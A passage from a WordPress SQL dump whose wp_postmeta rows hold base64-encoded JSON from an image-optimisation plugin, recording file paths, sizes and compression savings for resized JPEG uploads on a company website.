gzNTg3OTA0LCJpZCI6MzExfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1JlbGVhU3lzLTg5MDAtMTYwMHgxMDY1LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUmVsZWFTeXMtODkwMC0xNjAweDEwNjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvUmVsZWFTeXMtODkwMC0xNjAweDEwNjUuanBnIiwicmVkdWN0aW9uIjoxMzQzLCJ0aW1lIjoxNDgzNTg3OTEwLCJpZCI6MzExfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1JlbGVhU3lzLTg5MDAtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9SZWxlYVN5cy04OTAwLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvUmVsZWFTeXMtODkwMC0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NTM4LCJ0aW1lIjoxNDgzNTg3OTEzLCJpZCI6MzExfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1JlbGVhU3lzLTg5MDAtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9SZWxlYVN5cy04OTAwLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvUmVsZWFTeXMtODkwMC0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NDQ4LCJ0aW1lIjoxNDgzNTg3OTE3LCJpZCI6MzExfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1JlbGVhU3lzLTg5MDAtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9SZWxlYVN5cy04OTAwLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvUmVsZWFTeXMtODkwMC0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NDkzLCJ0aW1lIjoxNDgzNTg3OTIwLCJpZCI6MzExfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1JlbGVhU3lzLTg5MDAtNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9SZWxlYVN5cy04OTAwLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvUmVsZWFTeXMtODkwMC01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6Nzg1LCJ0aW1lIjoxNDgzNTg3OTI0LCJpZCI6MzExfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUmVsZWFTeXMtODkwMC0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1JlbGVhU3lzLTg5MDAtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9SZWxlYVN5cy04OTAwLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjo0ODUsInRpbWUiOjE0ODM1ODc5MjcsImlkIjozMTF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9SZWxlYVN5cy04OTAwLTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUmVsZWFTeXMtODkwMC0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1JlbGVhU3lzLTg5MDAtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjUzNCwidGltZSI6MTQ4MzU4NzkzMSwiaWQiOjMxMX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1JlbGVhU3lzLTg5MDAtMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9SZWxlYVN5cy04OTAwLTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvUmVsZWFTeXMtODkwMC0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6NzEyLCJ0aW1lIjoxNDgzNTg3OTM0LCJpZCI6MzExfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUmVsZWFTeXMtODkwMC0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1JlbGVhU3lzLTg5MDAtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9SZWxlYVN5cy04OTAwLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjo3NTEsInRpbWUiOjE0ODM1ODc5MzgsImlkIjozMTF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9SZWxlYVN5cy04OTAwLTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvUmVsZWFTeXMtODkwMC00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1JlbGVhU3lzLTg5MDAtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjc2OSwidGltZSI6MTQ4MzU4Nzk0MiwiaWQiOjMxMX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1JlbGVhU3lzLTg5MDAtNjAweDYwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9SZWxlYVN5cy04OTAwLTYwMHg2MDAuanBnIiwid2lkdGgiOiI2MDAiLCJoZWlnaHQiOiI2MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvUmVsZWFTeXMtODkwMC02MDB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MTI5NiwidGltZSI6MTQ4MzU4Nzk0NiwiaWQiOjMxMX1d'); 
INSERT INTO `wp_postmeta` VALUES (30255, 298, 'wpfc_optimisation_reduction', '24757'); 
INSERT INTO `wp_postmeta` VALUES (30256, 298, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvV2luZG1pbGwtUmVsZWFTeXMtODIuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9XaW5kbWlsbC1SZWxlYVN5cy04Mi5qcGciLCJ3aWR0aCI6NjE0NCwiaGVpZ2h0Ijo0MDgwLCJtaW1lX3R5cGUiOiIiLCJlcnJvcl9jb2RlIjo5LCJ0aW1lIjoxNDgzNTg3OTUxLCJpZCI6IjI5OCJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvV2luZG1pbGwtUmVsZWFTeXMtODItMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9XaW5kbWlsbC1SZWxlYVN5cy04Mi0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1dpbmRtaWxsLVJlbGVhU3lzLTgyLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo4MTcsInRpbWUiOjE0ODM1ODc5NTQsImlkIjoyOTh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvV2luZG1pbGwtUmVsZWFTeXMtODItODAweDUzMS5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9XaW5kbWlsbC1SZWxlYVN5cy04Mi04MDB4NTMxLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1dpbmRtaWxsLVJlbGVhU3lzLTgyLTgwMHg1MzEuanBnIiwicmVkdWN0aW9uIjoyNDYwLCJ0aW1lIjoxNDgzNTg3OTU4LCJpZCI6Mjk4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1dpbmRtaWxsLVJlbGVhU3lzLTgyLTc2OHg1MTAuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvV2luZG1pbGwtUmVsZWFTeXMtODItNzY4eDUxMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9XaW5kbWlsbC1SZWxlYVN5cy04Mi03Njh4NTEwLmpwZyIsInJlZHVjdGlvbiI6MjIyMiwidGltZSI6MTQ4MzU4Nzk2MiwiaWQiOjI5OH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9XaW5kbWlsbC1SZWxlYVN5cy04Mi0xNjAweDEwNjMuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2MywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9XaW5kbWlsbC1SZWxlYVN5cy04Mi0xNjAweDEwNjMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvV2luZG1pbGwtUmVsZWFTeXMtODItMTYwMHgxMDYzLmpwZyIsInJlZHVjdGlvbiI6MTEyMjcsInRpbWUiOjE0ODM1ODc5NjYsImlkIjoyOTh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvV2luZG1pbGwtUmVsZWFTeXMtODItMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9XaW5kbWlsbC1SZWxlYVN5cy04Mi0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1dpbmRtaWxsLVJlbGVhU3lzLTgyLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo1NTQsInRpbWUiOjE0ODM1ODc5NjksImlkIjoyOTh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvV2luZG1pbGwtUmVsZWFTeXMtODItMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9XaW5kbWlsbC1SZWxlYVN5cy04Mi0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1dpbmRtaWxsLVJlbGVhU3lzLTgyLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo0NjcsInRpbWUiOjE0ODM1ODc5NzIsImlkIjoyOTh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvV2luZG1pbGwtUmVsZWFTeXMtODItMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9XaW5kbWlsbC1SZWxlYVN5cy04Mi0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1dpbmRtaWxsLVJlbGVhU3lzLTgyLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo1MTUsInRpbWUiOjE0ODM1ODc5NzYsImlkIjoyOTh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvV2luZG1pbGwtUmVsZWFTeXMtODItNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9XaW5kbWlsbC1SZWxlYVN5cy04Mi01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1dpbmRtaWxsLVJlbGVhU3lzLTgyLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxODM4LCJ0aW1lIjoxNDgzNTg3OTc5LCJpZCI6Mjk4fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvV2luZG1pbGwtUmVsZWFTeXMtODItMTE0eDEzMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9XaW5kbWlsbC1SZWxlYVN5cy04Mi0xMTR4MTMwLmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTMwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1dpbmRtaWxsLVJlbGVhU3lzLTgyLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjozODMsInRpbWUiOjE0ODM1ODc5ODIsImlkIjoyOTh9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9XaW5kbWlsbC1SZWxlYVN5cy04Mi0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1dpbmRtaWxsLVJlbGVhU3lzLTgyLTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvV2luZG1pbGwtUmVsZWFTeXMtODItMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjQxOCwidGltZSI6MTQ4MzU4Nzk4NiwiaWQiOjI5OH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1dpbmRtaWxsLVJlbGVhU3lzLTgyLTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvV2luZG1pbGwtUmVsZWFTeXMtODItMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9XaW5kbWlsbC1SZWxlYVN5cy04Mi0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6NTY1LCJ0aW1lIjoxNDgzNTg3OTg5LCJpZCI6Mjk4fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvV2luZG1pbGwtUmVsZWFTeXMtODItMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9XaW5kbWlsbC1SZWxlYVN5cy04Mi0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1dpbmRtaWxsLVJlbGVhU3lzLTgyLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjo2MDYsInRpbWUiOjE0ODM1ODc5OTMsImlkIjoyOTh9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9XaW5kbWlsbC1SZWxlYVN5cy04Mi00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1dpbmRtaWxsLVJlbGVhU3lzLTgyLTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvV2luZG1pbGwtUmVsZWFTeXMtODItNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjg1MiwidGltZSI6MTQ4MzU4Nzk5NiwiaWQiOjI5OH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1dpbmRtaWxsLVJlbGVhU3lzLTgyLTYwMHg2MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvV2luZG1pbGwtUmVsZWFTeXMtODItNjAweDYwMC5qcGciLCJ3aWR0aCI6IjYwMCIsImhlaWdodCI6IjYwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9XaW5kbWlsbC1SZWxlYVN5cy04Mi02MDB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MTgzMywidGltZSI6MTQ4MzU4ODAwMCwiaWQiOjI5OH1d'); 
INSERT INTO `wp_postmeta` VALUES (30257, 296, 'wpfc_optimisation_reduction', '19368'); 
INSERT INTO `wp_postmeta` VALUES (30258, 296, 'wpfc_optimisation', 